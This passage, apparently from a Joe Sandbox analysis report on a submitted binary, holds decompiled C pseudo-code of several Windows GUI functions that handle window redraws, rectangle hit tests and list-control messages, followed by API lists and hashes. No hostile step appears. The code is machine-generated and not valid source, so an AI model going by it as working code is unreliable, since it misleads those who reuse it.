				if( *((intOrPtr*)(__ecx + 0x250)) == 0 ||  *((intOrPtr*)(__ecx + 0x264)) != 0) {
					 *(_t158 + 0x290) = _a8;
					E00CA67E1( &(_v24.right));
					_t166 =  &(_v24.right);
					_v4 = 0;
					asm("sbb eax, eax");
					if(E00CA2A90(_t166, ( ~( *(_t158 + 0x290)) & 0x000003f0) + 0x3ea3) == 0) {
						E00CAA4E7(_t158, _t166, _t194, 0, __eflags);
						asm("int3");
						_t221 = _t225;
						_t105 =  *0xe68dd4; // 0x8d2643c2
						_v24.bottom = _t105 ^ _t221;
						_push(_t158);
						_t159 = _t166;
						_t167 = _v0;
						_v44 = _t159;
						_v36 = _t167;
						_push(0);
						_push(_t194);
						__eflags = _t167;
						if(_t167 < 0) {
							L38:
							_t107 = 0;
							__eflags = 0;
							goto L39;
						} else {
							__eflags = _t167 -  *((intOrPtr*)(_t159 + 0xbc));
							if(_t167 >=  *((intOrPtr*)(_t159 + 0xbc))) {
								goto L38;
							} else {
								__eflags =  *(_t159 + 0x264);
								if( *(_t159 + 0x264) == 0) {
									L23:
									_t107 = 1;
									L39:
									_pop(_t195);
									_pop(_t208);
									__eflags = _v8 ^ _t221;
									_pop(_t160);
									return E00DDCBCE(_t107, _t160, _v8 ^ _t221, _t193, _t195, _t208);
								} else {
									__eflags =  *((intOrPtr*)(_t159 + 0x2e4)) -  *((intOrPtr*)(_t159 + 0x2dc));
									if( *((intOrPtr*)(_t159 + 0x2e4)) -  *((intOrPtr*)(_t159 + 0x2dc)) <= 0) {
										goto L23;
									} else {
										_v36 = _t159 + 0x94;
										_t114 =  *((intOrPtr*)(E00CBFD51(_t159, _t159 + 0x94, _t194, 0, _t167)));
										asm("movsd");
										asm("movsd");
										asm("movsd");
										asm("movsd");
										__eflags =  *(_t159 + 0x290);
										if( *(_t159 + 0x290) == 0) {
											__eflags =  *(_t159 + 0x254);
											if( *(_t159 + 0x254) != 0) {
												L27:
												__eflags = _v24.left -  *((intOrPtr*)(_t159 + 0x2dc));
												if(_v24.left <  *((intOrPtr*)(_t159 + 0x2dc))) {
													L29:
													_t161 = 0;
													_v28 = 0;
													_t200 =  *((intOrPtr*)(_t159 + 0x2e8)) -  *((intOrPtr*)(_t159 + 0x2e0)) -  *0xe6843c - 1;
													__eflags = _t200;
													_t211 = _v32;
													do {
														_t174 = _v28 +  *((intOrPtr*)( *((intOrPtr*)(E00CBFD51(_t161, _v36, _t200, _t211, _t161))) + 0x18)) -  *((intOrPtr*)( *((intOrPtr*)(E00CBFD51(_t161, _v36, _t200, _t211, _t161))) + 0x10)) - _t200;
														_t161 = _t161 + 1;
														_v28 = _t174;
														__eflags = _t161 - _t211;
													} while (_t161 <= _t211);
													_t159 = _v40;
													 *(_t159 + 0x2a4) =  *(_t159 + 0x2a4) & 0x00000000;
													 *(_t159 + 0x2b0) =  *(_t159 + 0x2b0) & 0x00000000;
													__eflags = _t211;
													if(_t211 > 0) {
														_t193 = 0;
														__eflags = 0;
														while(1) {
															__eflags = _t174 -  *((intOrPtr*)(_t159 + 0x2e4)) -  *((intOrPtr*)(_t159 + 0x2dc));
															if(_t174 <=  *((intOrPtr*)(_t159 + 0x2e4)) -  *((intOrPtr*)(_t159 + 0x2dc))) {
																goto L22;
															}
															__eflags = _t193;
															if(__eflags < 0) {
																L40:
																E00CAA4E7(_t159, _t174, _t200, _t211, __eflags);
																asm("int3");
																_push(_t221);
																_push(_t159);
																_t162 = _v52;
																_push(_t211);
																_t214 = _t174;
																_push(_t200);
																__eflags = _t162->y -  *((intOrPtr*)(_t214 + 0x110));
																if(_t162->y <  *((intOrPtr*)(_t214 + 0x110))) {
																	L47:
																	_t131 = 0;
																	__eflags = 0;
																} else {
																	_t202 = 0;
																	__eflags =  *(_t214 + 0xbc);
																	if( *(_t214 + 0xbc) <= 0) {
																		L46:
																		_t131 = E00CB277F(_t162, _t174, _t193, GetParent( *(_t214 + 0x20)));
																	} else {
																		_t133 = _t214 + 0x94;
																		do {
																			_t174 = _t133;
																			_t135 =  *((intOrPtr*)(E00CBFD51(_t162, _t133, _t202, _t214, _t202)));
																			__eflags =  *(_t135 + 0x34);
																			if( *(_t135 + 0x34) == 0) {
																				goto L45;
																			} else {
																				_push(_t162->y);
																				_t137 = PtInRect(_t135 + 0x10,  *_t162);
																				__eflags = _t137;
																				if(_t137 != 0) {
																					goto L47;
																				} else {
																					goto L45;
																				}
																			}
																			goto L48;
																			L45:
																			_t202 = _t202 + 1;
																			_t133 = _t214 + 0x94;
																			__eflags = _t202 -  *(_t214 + 0xbc);
																		} while (_t202 <  *(_t214 + 0xbc));
																		goto L46;
																	}
																}
																L48:
																return _t131;
															} else {
																__eflags = _t193 -  *((intOrPtr*)(_t159 + 0x9c));
																if(__eflags >= 0) {
																	goto L40;
																} else {
																	_t181 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t159 + 0x98)) + _t193 * 4)) + 0x18)) -  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t159 + 0x98)) + _t193 * 4)) + 0x10)) - _t200;
																	 *(_t159 + 0x2a4) =  *(_t159 + 0x2a4) + _t181;
																	_v28 = _v28 - _t181;
																	_t193 = _t193 + 1;
																	_t174 = _v28;
																	 *(_t159 + 0x2b0) = _t193;
																	__eflags = _t193 - _t211;
																	if(_t193 < _t211) {
																		continue;
																	} else {
																		goto L22;
																	}
																}
															}
															goto L49;
														}
													}
													goto L22;
												} else {
													__eflags = _v24.right -  *((intOrPtr*)(_t159 + 0x2e4));
													if(_v24.right <=  *((intOrPtr*)(_t159 + 0x2e4))) {
														goto L23;
													} else {
														goto L29;
													}
												}
											} else {
												__eflags =  *(_t159 + 0x258);
												if( *(_t159 + 0x258) != 0) {
													goto L27;
												} else {
													__eflags =  *(_t159 + 0x25c);
													if( *(_t159 + 0x25c) != 0) {
														goto L27;
													} else {
														_t141 =  *((intOrPtr*)(_t159 + 0x2dc));
														_t193 = _v24.left;
														__eflags = _t193 - _t141;
														if(_t193 >= _t141) {
															_t203 =  *((intOrPtr*)(_t159 + 0x2e4));
															_t216 = _v24.right;
															__eflags = _t216 - _t203;
															if(_t216 <= _t203) {
																goto L23;
															} else {
																__eflags = _t216 - _t193 - _t203 - _t141;
																if(_t216 - _t193 > _t203 - _t141) {
																	goto L23;
																} else {
																	 *(_t159 + 0x2a4) =  *(_t159 + 0x2a4) + _t216 - _t203;
																	goto L22;
																}
															}
															goto L49;
														} else {
															_t193 = _t193 - _t141;
															_t43 = _t159 + 0x2a4;
															 *_t43 =  *(_t159 + 0x2a4) + _t193;
															__eflags =  *_t43;
															L22:
															 *0xe17a64();
															 *((intOrPtr*)( *((intOrPtr*)( *_t159 + 0x2dc))))();
															 *0xe17a64();
															 *((intOrPtr*)( *((intOrPtr*)( *_t159 + 0x2e0))))();
															RedrawWindow( *(_t159 + 0x20), 0, 0, 0x105);
														}
														goto L23;
													}
												}
											}
										} else {
											__eflags =  *((intOrPtr*)(_t114 + 0x24)) + _v24.left -  *((intOrPtr*)(_t159 + 0x2e4));
											if( *((intOrPtr*)(_t114 + 0x24)) + _v24.left >  *((intOrPtr*)(_t159 + 0x2e4))) {
												L16:
												E00CFC7AC(_t159, _v32, 0);
											} else {
												_t148 = IsRectEmpty( &_v24);
												__eflags = _t148;
												if(_t148 != 0) {
													goto L16;
												}
											}
											goto L23;
										}
									}
								}
							}
						}
					} else {
						_t219 = _v24.right;
						if( *((intOrPtr*)(_t158 + 0x264)) != 0) {
							E00CC7158(_t158, _t158 + 0xb58, _t193, _t219);
						}
						E00D06958(_t158);
						 *0xe17a64();
						_t152 =  *((intOrPtr*)( *((intOrPtr*)( *_t158 + 0x184))))();
						 *(_t158 + 0x2a4) =  *(_t158 + 0x2a4) & 0x00000000;
						 *(_t158 + 0x2b0) =  *(_t158 + 0x2b0) & 0x00000000;
						_t188 =  *((intOrPtr*)(_t158 + 0xc0));
						if(_t188 >= 0) {
							 *0xe17a64(_t188);
							_t152 =  *((intOrPtr*)( *((intOrPtr*)( *_t158 + 0x224))))();
						}
						_t96 = E00CA2975(_t152, _t219 - 0x10);
						goto L8;
					}
				} else {
					L8:
					return E00DDD4FA(_t96);
				}
				L49:
			}

0x00d02cb1
0x00d02cb1
0x00d02cb1
0x00d02cb8
0x00d02cbd
0x00d02cc7
0x00d02cdb
0x00d02ce1
0x00d02cec
0x00d02cf1
0x00d02cf4
0x00d02d08
0x00d02d79
0x00d02d7e
0x00d02d80
0x00d02d85
0x00d02d8c
0x00d02d8f
0x00d02d90
0x00d02d92
0x00d02d95
0x00d02d98
0x00d02d9b
0x00d02d9c
0x00d02d9d
0x00d02d9f
0x00d02f76
0x00d02f76
0x00d02f76
0x00000000
0x00d02da5
0x00d02da5
0x00d02dab
0x00000000
0x00d02db1
0x00d02db1
0x00d02db8
0x00d02e92
0x00d02e94
0x00d02f78
0x00d02f7b
0x00d02f7c
0x00d02f7d
0x00d02f7f
0x00d02f86
0x00d02dbe
0x00d02dca
0x00d02dcc
0x00000000
0x00d02dd2
0x00d02ddb
0x00d02de6
0x00d02deb
0x00d02dec
0x00d02ded
0x00d02dee
0x00d02df1
0x00d02df7
0x00d02e23
0x00d02e29
0x00d02ebd
0x00d02ec0
0x00d02ec6
0x00d02ed3
0x00d02edf
0x00d02ee7
0x00d02eea
0x00d02eea
0x00d02eeb
0x00d02eee
0x00d02f04
0x00d02f06
0x00d02f07
0x00d02f0a
0x00d02f0a
0x00d02f0e
0x00d02f11
0x00d02f18
0x00d02f1f
0x00d02f21
0x00d02f27
0x00d02f27
0x00d02f29
0x00d02f35
0x00d02f37
0x00000000
0x00000000
0x00d02f3d
0x00d02f3f
0x00d02f89
0x00d02f89
0x00d02f8e
0x00d02f8f
0x00d02f92
0x00d02f93
0x00d02f96
0x00d02f97
0x00d02f99
0x00d02f9d
0x00d02fa3
0x00d02ff8
0x00d02ff8
0x00d02ff8
0x00d02fa5
0x00d02fa5
0x00d02fa7
0x00d02fad
0x00d02fe7
0x00d02ff1
0x00d02faf
0x00d02faf
0x00d02fb5
0x00d02fb6
0x00d02fbd
0x00d02fbf
0x00d02fc3
0x00000000
0x00d02fc5
0x00d02fc5
0x00d02fce
0x00d02fd4
0x00d02fd6
0x00000000
0x00000000
0x00000000
0x00000000
0x00d02fd6
0x00000000
0x00d02fd8
0x00d02fd8
0x00d02fd9
0x00d02fdf
0x00d02fdf
0x00000000
0x00d02fb5
0x00d02fad
0x00d02ffa
0x00d02ffe
0x00d02f41
0x00d02f41
0x00d02f47
0x00000000
0x00d02f49
0x00d02f58
0x00d02f5a
0x00d02f60
0x00d02f63
0x00d02f64
0x00d02f67
0x00d02f6d
0x00d02f6f
0x00000000
0x00d02f71
0x00000000
0x00d02f71
0x00d02f6f
0x00d02f47
0x00000000
0x00d02f3f
0x00d02f29
0x00000000
0x00d02ec8
0x00d02ecb
0x00d02ed1
0x00000000
0x00000000
0x00000000
0x00000000
0x00d02ed1
0x00d02e2f
0x00d02e2f
0x00d02e35
0x00000000
0x00d02e3b
0x00d02e3b
0x00d02e41
0x00000000
0x00d02e43
0x00d02e43
0x00d02e49
0x00d02e4c
0x00d02e4e
0x00d02e9a
0x00d02ea0
0x00d02ea3
0x00d02ea5
0x00000000
0x00d02ea7
0x00d02eaf
0x00d02eb1
0x00000000
0x00d02eb3
0x00d02eb5
0x00000000
0x00d02eb5
0x00d02eb1
0x00000000
0x00d02e50
0x00d02e50
0x00d02e52
0x00d02e52
0x00d02e52
0x00d02e58
0x00d02e62
0x00d02e6a
0x00d02e76
0x00d02e7e
0x00d02e8c
0x00d02e8c
0x00000000
0x00d02e4e
0x00d02e41
0x00d02e35
0x00d02df9
0x00d02dff
0x00d02e05
0x00d02e15
0x00d02e1c
0x00d02e07
0x00d02e0b
0x00d02e11
0x00d02e13
0x00000000
0x00000000
0x00d02e13
0x00000000
0x00d02e05
0x00d02df7
0x00d02dcc
0x00d02db8
0x00d02dab
0x00d02d0a
0x00d02d10
0x00d02d13
0x00d02d1c
0x00d02d1c
0x00d02d23
0x00d02d32
0x00d02d3a
0x00d02d3c
0x00d02d43
0x00d02d4a
0x00d02d52
0x00d02d5f
0x00d02d67
0x00d02d67
0x00d02d6c
0x00000000
0x00d02d6c
0x00d02d71
0x00d02d71
0x00d02d76
0x00d02d76
0x00000000

APIs

__EH_prolog3.LIBCMT ref: 00D02CB8
IsRectEmpty.USER32 ref: 00D02E0B
RedrawWindow.USER32(?,00000000,00000000,00000105), ref: 00D02E8C
PtInRect.USER32(?,00000000,?), ref: 00D02FCE
GetParent.USER32(?), ref: 00D02FEA

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: Rect$EmptyH_prolog3ParentRedrawWindow
String ID:
API String ID: 3997883630-0
Opcode ID: f9a013e7942e25ac3c388d82cebccb120120a0d1f256575521f28ffe29cdb1f8
Instruction ID: 573fe9c083ff8252b06952fb2508d20fcb451c30a3ae63e719bd40127802845c
Opcode Fuzzy Hash: f9a013e7942e25ac3c388d82cebccb120120a0d1f256575521f28ffe29cdb1f8
Instruction Fuzzy Hash: 50A16A31A012168FCF14DF69C988BAE77B5EF44700F1845BAEC49AB296DB70A945CB70

Uniqueness

Uniqueness Score: -1.00%

Function 00CD2D02 Relevance: 7.7, APIs: 5, Instructions: 178
windowmemoryCOMMON

Download Yara Rule

C-Code - Quality: 49%

			E00CD2D02(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t78;
				signed int _t85;
				long _t96;
				signed int _t104;
				long _t106;
				long _t110;
				intOrPtr* _t113;
				void* _t114;
				intOrPtr* _t118;
				int _t119;
				signed int _t122;
				intOrPtr _t128;
				signed int _t132;
				signed int _t142;
				intOrPtr* _t145;
				intOrPtr* _t148;
				intOrPtr* _t151;
				int _t154;
				void* _t156;
				void* _t157;

				E00DDD52C(0xe09f1c, __ebx, __edi, __esi);
				_t145 = __ecx;
				_t118 =  *((intOrPtr*)(_t156 + 8));
				 *(_t156 - 0x18) =  *(_t156 - 0x18) & 0x00000000;
				 *0xe17a64(_t118, 0,  *((intOrPtr*)(__ecx + 0x15c)), _t156 - 0x18, 0x60);
				_t78 =  *((intOrPtr*)( *((intOrPtr*)( *_t118 + 0x10))))();
				 *((intOrPtr*)(_t156 - 0x30)) = _t78;
				if(_t78 >= 0) {
					_t122 =  *(_t156 - 0x18);
					if(_t122 != 0) {
						 *((intOrPtr*)(_t156 - 0x10)) = 1;
						_t148 =  *((intOrPtr*)( *_t122 + 0xc));
						_push(_t156 - 0x10);
						_push(_t156 - 0x14);
						_push(1);
						while(1) {
							 *0xe17a64(_t122);
							if( *_t148() != 0) {
								break;
							}
							if( *((intOrPtr*)(_t156 - 0x10)) != 0) {
								E00DDFBE0(_t145, _t156 - 0x6c, 0, 0x3c);
								_t157 = _t157 + 0xc;
								 *(_t156 - 0x6c) = 0xf;
								 *0xe17a64(_t118);
								 *((intOrPtr*)( *((intOrPtr*)( *_t118 + 4))))();
								_t151 = GlobalAlloc(0x40, 0xc);
								 *((intOrPtr*)(_t156 - 0x20)) = _t151;
								 *((intOrPtr*)(_t151 + 8)) =  *((intOrPtr*)(_t156 - 0x14));
								_t128 =  *0xe885c8; // 0x0
								 *((intOrPtr*)(_t151 + 4)) = E00D1E04E(_t128,  *((intOrPtr*)(_t156 + 0xc)),  *((intOrPtr*)(_t156 - 0x14)));
								 *_t151 = _t118;
								 *((intOrPtr*)(_t156 - 0x4c)) = _t151;
								 *((intOrPtr*)(_t156 - 0x58)) = 0xe4bcbb;
								_t96 = SendMessageA( *(_t145 + 0x20), 0x1004, 0, 0);
								 *0xe17a64(_t96,  *((intOrPtr*)(_t156 - 0x20)));
								 *((intOrPtr*)(_t156 - 0x50)) =  *((intOrPtr*)( *((intOrPtr*)( *_t145 + 0x19c))))();
								 *(_t156 - 0x1c) = 0xfc000;
								 *0xe17a64(_t118, 1, _t156 - 0x14, _t156 - 0x1c);
								 *((intOrPtr*)( *((intOrPtr*)( *_t118 + 0x24))))();
								_t104 =  *(_t156 - 0x6c);
								_t132 =  *(_t156 - 0x5c);
								_t142 =  *(_t156 - 0x60);
								if(( *(_t156 - 0x1c) & 0x00020000) != 0) {
									_t104 = _t104 | 0x00000008;
									_t132 = _t132 | 0x00000f00;
									_t142 = _t142 | 0x00000100;
									 *(_t156 - 0x6c) = _t104;
									 *(_t156 - 0x5c) = _t132;
									 *(_t156 - 0x60) = _t142;
								}
								if(( *(_t156 - 0x1c) & 0x00008000) != 0) {
									 *(_t156 - 0x6c) = _t104 | 0x00000008;
									 *(_t156 - 0x5c) = _t132 | 0x00000004;
									 *(_t156 - 0x60) = _t142 | 0x00000004;
								}
								_t154 = 0;
								_t106 = SendMessageA( *(_t145 + 0x20), 0x1007, 0, _t156 - 0x6c);
								 *(_t156 - 0x24) = _t106;
								if(_t106 >= 0) {
									_t110 = SendMessageA( *(_t145 + 0xa0), 0x1200, 0, 0);
									 *(_t156 - 0x2c) = _t110;
									_t119 = 0;
									if(_t110 > 0) {
										do {
											 *0xe17a64(_t156 - 0x28,  *(_t156 - 0x24), _t119,  *((intOrPtr*)(_t156 - 0x20)));
											_t113 =  *((intOrPtr*)( *((intOrPtr*)( *_t145 + 0x198))))();
											_t154 = 0;
											 *(_t156 - 4) = 0;
											_t114 = E00CD7A1A(_t145,  *(_t156 - 0x24), _t119,  *_t113);
											 *(_t156 - 4) =  *(_t156 - 4) | 0xffffffff;
											E00CA2975(_t114,  *((intOrPtr*)(_t156 - 0x28)) - 0x10);
											_t119 = _t119 + 1;
										} while (_t119 <  *(_t156 - 0x2c));
									}
									_t118 =  *((intOrPtr*)(_t156 + 8));
								}
								_t122 =  *(_t156 - 0x18);
								 *((intOrPtr*)(_t156 - 0x10)) = _t154;
								_t148 =  *((intOrPtr*)( *_t122 + 0xc));
								_push(_t156 - 0x10);
								_push(_t156 - 0x14);
								_push(1);
								continue;
							}
							break;
						}
						_t85 =  *(_t156 - 0x18);
						 *0xe17a64(_t85);
						 *((intOrPtr*)( *((intOrPtr*)( *_t85 + 8))))();
						_t78 =  *((intOrPtr*)(_t156 - 0x30));
					}
				}
				return E00DDD4FA(_t78);
			}

0x00cd2d09
0x00cd2d0e
0x00cd2d10
0x00cd2d13
0x00cd2d2b
0x00cd2d31
0x00cd2d33
0x00cd2d38
0x00cd2d3e
0x00cd2d43
0x00cd2d4c
0x00cd2d51
0x00cd2d57
0x00cd2d5b
0x00cd2d5c
0x00cd2ef1
0x00cd2ef4
0x00cd2efe
0x00000000
0x00000000
0x00cd2d66
0x00cd2d74
0x00cd2d7b
0x00cd2d7e
0x00cd2d8b
0x00cd2d91
0x00cd2da0
0x00cd2da2
0x00cd2da5
0x00cd2dab
0x00cd2db9
0x00cd2dbc
0x00cd2dcc
0x00cd2dd5
0x00cd2ddc
0x00cd2de8
0x00cd2df2
0x00cd2df7
0x00cd2e0e
0x00cd2e14
0x00cd2e1d
0x00cd2e20
0x00cd2e23
0x00cd2e26
0x00cd2e28
0x00cd2e2b
0x00cd2e31
0x00cd2e37
0x00cd2e3a
0x00cd2e3d
0x00cd2e3d
0x00cd2e47
0x00cd2e52
0x00cd2e55
0x00cd2e58
0x00cd2e58
0x00cd2e5e
0x00cd2e6a
0x00cd2e70
0x00cd2e75
0x00cd2e84
0x00cd2e8a
0x00cd2e8d
0x00cd2e91
0x00cd2e93
0x00cd2ea8
0x00cd2eb0
0x00cd2eb4
0x00cd2ebc
0x00cd2ebf
0x00cd2ec7
0x00cd2ece
0x00cd2ed3
0x00cd2ed4
0x00cd2e93
0x00cd2ed9
0x00cd2ed9
0x00cd2edc
0x00cd2edf
0x00cd2ee4
0x00cd2eea
0x00cd2eee
0x00cd2eef
0x00000000
0x00cd2eef
0x00000000
0x00cd2d66
0x00cd2f04
0x00cd2f0f
0x00cd2f15
0x00cd2f17
0x00cd2f17
0x00cd2d43
0x00cd2f1f

APIs

__EH_prolog3.LIBCMT ref: 00CD2D09
GlobalAlloc.KERNEL32(00000040,0000000C), ref: 00CD2D97
SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00CD2DDC
SendMessageA.USER32(?,00001007,00000000,0000000F), ref: 00CD2E6A
SendMessageA.USER32(?,00001200,00000000,00000000), ref: 00CD2E84

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: MessageSend$AllocGlobalH_prolog3
String ID:
API String ID: 3246992648-0
Opcode ID: 12be1b508aa103d486e5a2d9aa678302f60a5a34814a8940dbcee94228c3182e
Instruction ID: ce83e93f080587b37482c8916f440f2c926df88a16c20dd8a7ea3feb433b67d8
Opcode Fuzzy Hash: 12be1b508aa103d486e5a2d9aa678302f60a5a34814a8940dbcee94228c3182e
Instruction Fuzzy Hash: 3361E770A002199FDB14CF95CC59AEEBBB9FF48710F14405AE959BB390DB70AA05CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00CD5487 Relevance: 7.7, APIs: 5, Instructions: 173
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E00CD5487(intOrPtr* __ebx, void* __ecx, void* __edx, void* __edi, intOrPtr __esi, void* __eflags) {
				intOrPtr _t81;
				intOrPtr _t90;
				intOrPtr _t97;
				signed int _t98;
				void* _t111;
				void* _t127;
				intOrPtr _t140;
				short _t149;
				void* _t165;
				void* _t168;
				void* _t174;

				_t169 = __esi;
				_t165 = __edx;
				_t130 = __ebx;
				_push(0x3c);
				E00DDD55F(0xe0a123, __ebx, __edi, __esi);
				_t168 = __ecx;
				 *((intOrPtr*)(_t174 - 0x38)) =  *((intOrPtr*)(_t174 + 0xc));
				if(__ecx == 0) {
					L14:
					__eflags = 0;
				} else {
					_t177 =  *((intOrPtr*)(__ecx + 0x20));
					if( *((intOrPtr*)(__ecx + 0x20)) == 0) {
						goto L14;
					} else {
						_t130 = 0;
						 *(_t174 - 0x30) = 0;
						 *((intOrPtr*)(_t174 - 0x2c)) = 0;
						 *((intOrPtr*)(_t174 - 0x28)) = 0;
						 *((intOrPtr*)(_t174 - 0x24)) = 0;
						SetRectEmpty(_t174 - 0x30);
						_t81 = E00CA9583(_t177, 0x7a8);
						 *((intOrPtr*)(_t174 - 0x34)) = _t81;
						 *(_t174 - 4) = 0;
						_t178 = _t81;
						if(_t81 != 0) {
							_t130 = E00CC5032(0, _t81, _t168, __esi, _t178);
						}
						 *(_t174 - 4) =  *(_t174 - 4) | 0xffffffff;
						_t169 =  *((intOrPtr*)( *_t130 + 0x164));
						 *0xe17a64(0xe4bcbb, 0x5000000b, _t174 - 0x30, _t168,  *((intOrPtr*)(_t168 + 0x8c)) + 2);
						if( *((intOrPtr*)( *((intOrPtr*)( *_t130 + 0x164))))() == 0) {
							goto L14;
						} else {
							 *(_t130 + 0x80) = 1;
							 *(_t130 + 0x94) =  *(_t130 + 0x94) & 0x00000000;
							 *((intOrPtr*)(_t130 + 0x9c)) =  *((intOrPtr*)(_t168 + 0xe4));
							E00CC6CD7( *((intOrPtr*)(_t174 + 8)), 0, 0);
							_t90 =  *((intOrPtr*)(_t174 - 0x38));
							_t180 = _t90;
							if(_t90 != 0) {
								_push(_t90);
								E00CA2ABC(_t130, _t174 - 0x34, _t168, _t169, _t180);
								_t149 =  *(_t174 + 0x10);
								 *(_t174 - 4) = 1;
								if(_t149 != 0) {
									 *((short*)(_t174 - 0x3e)) = _t149;
									 *((short*)(_t174 - 0x3c)) = 0;
									 *(_t174 - 0x40) =  *(_t174 + 0x14) | 0x00000001;
									E00D23EC3(_t174 - 0x48, _t174 - 0x40);
									E00CA67E1(_t174 - 0x38);
									 *(_t174 - 4) = 3;
									E00D24019(_t130, _t174 - 0x48,  *(_t174 + 0x14) | 0x00000001, _t174 - 0x38);
									_push(E00DEC1A0(0xe1e8e8));
									E00CA93E8(_t130, _t174 - 0x34, _t168, 0xe1e8e8);
									_push( *((intOrPtr*)( *((intOrPtr*)(_t174 - 0x38)) - 0xc)));
									E00CA93E8(_t130, _t174 - 0x34, _t168,  *((intOrPtr*)(_t174 - 0x38)));
									_push(E00DEC1A0(0xe1e110));
									_t127 = E00CA2975(E00CA93E8(_t130, _t174 - 0x34, _t168, 0xe1e110),  *((intOrPtr*)(_t174 - 0x38)) - 0x10);
									 *(_t174 - 4) = 1;
									E00D23ED8(_t127, _t174 - 0x48);
								}
								_t111 = E00CC7158(_t130, _t130, _t165,  *((intOrPtr*)(_t174 - 0x34)));
								 *(_t174 - 4) =  *(_t174 - 4) | 0xffffffff;
								E00CA2975(_t111,  *((intOrPtr*)(_t174 - 0x34)) - 0x10);
							}
							 *0xe17a64(_t174 - 0x48, 0);
							 *((intOrPtr*)( *((intOrPtr*)( *_t130 + 0x170))))();
							 *(_t174 - 0x20) = 0;
							 *((intOrPtr*)(_t174 - 0x1c)) = 0;
							 *((intOrPtr*)(_t174 - 0x18)) = 0;
							 *((intOrPtr*)(_t174 - 0x14)) = 0;
							GetWindowRect( *(_t130 + 0x20), _t174 - 0x20);
							_t97 =  *((intOrPtr*)(_t174 - 0x18)) -  *(_t174 - 0x20);
							_t140 =  *((intOrPtr*)(_t174 - 0x14)) -  *((intOrPtr*)(_t174 - 0x1c));
							_t184 =  *((intOrPtr*)(_t168 + 0x8c));
							if( *((intOrPtr*)(_t168 + 0x8c)) == 0) {
								 *((intOrPtr*)(_t168 + 0xec)) = _t97;
								 *((intOrPtr*)(_t168 + 0xf0)) = _t140;
							}
							_t98 = E00CBC02C(_t168 + 0x80, _t184, _t130);
							_t166 =  *(_t174 + 0x10);
							E00CBC02C(_t168 + 0x9c,  *(_t174 + 0x10), ((_t98 & 0xffffff00 |  *(_t174 + 0x10) == 0x00000000) - 0x00000001 &  *(_t174 + 0x14) & 0x000000ff) << 0x00000010 |  *(_t174 + 0x10) & 0x0000ffff);
							_t169 =  *((intOrPtr*)(_t174 + 0x18));
							if(_t169 != 0) {
								_t187 =  *((intOrPtr*)(_t168 + 0x8c)) - 1;
								 *((intOrPtr*)(E00CD5246(_t130, _t166, _t168,  *((intOrPtr*)(_t168 + 0x8c)) - 1,  *((intOrPtr*)(_t168 + 0x8c)) - 1))) = _t169;
							}
							E00CD5755(_t130, _t168, _t166, _t168, _t169, _t187);
						}
					}
				}
				return E00DDD50E(_t130, _t168, _t169);
			}

0x00cd5487
0x00cd5487
0x00cd5487
0x00cd5487
0x00cd548e
0x00cd5493
0x00cd5498
0x00cd549d
0x00cd56bf
0x00cd56bf
0x00cd54a3
0x00cd54a3
0x00cd54a7
0x00000000
0x00cd54ad
0x00cd54ad
0x00cd54b3
0x00cd54b6
0x00cd54b9
0x00cd54bc
0x00cd54bf
0x00cd54ca
0x00cd54d0
0x00cd54d3
0x00cd54d6
0x00cd54d8
0x00cd54e1
0x00cd54e1
0x00cd54e5
0x00cd54e9
0x00cd550a
0x00cd5516
0x00000000
0x00cd551c
0x00cd5523
0x00cd5535
0x00cd553c
0x00cd5542
0x00cd5547
0x00cd554a
0x00cd554c
0x00cd5552
0x00cd5556
0x00cd555b
0x00cd555f
0x00cd5569
0x00cd5571
0x00cd5575
0x00cd5581
0x00cd5588
0x00cd5590
0x00cd5598
0x00cd55a0
0x00cd55b1
0x00cd55b6
0x00cd55c1
0x00cd55c5
0x00cd55d6
0x00cd55e6
0x00cd55ee
0x00cd55f2
0x00cd55f2
0x00cd55fc
0x00cd5604
0x00cd560b
0x00cd560b
0x00cd5620
0x00cd5628
0x00cd5630
0x00cd5633
0x00cd5636
0x00cd5639
0x00cd563f
0x00cd564b
0x00cd564e
0x00cd5651
0x00cd5657
0x00cd5659
0x00cd565f
0x00cd565f
0x00cd566c
0x00cd5671
0x00cd5692
0x00cd5697
0x00cd569c
0x00cd56aa
0x00cd56b1
0x00cd56b1
0x00cd56b5
0x00cd56bc
0x00cd5516
0x00cd54a7
0x00cd56c6

APIs

__EH_prolog3_GS.LIBCMT ref: 00CD548E
SetRectEmpty.USER32(?), ref: 00CD54BF
_strlen.LIBCMT ref: 00CD55AB
_strlen.LIBCMT ref: 00CD55D0

Part of subcall function 00CC5032: __EH_prolog3.LIBCMT ref: 00CC5039

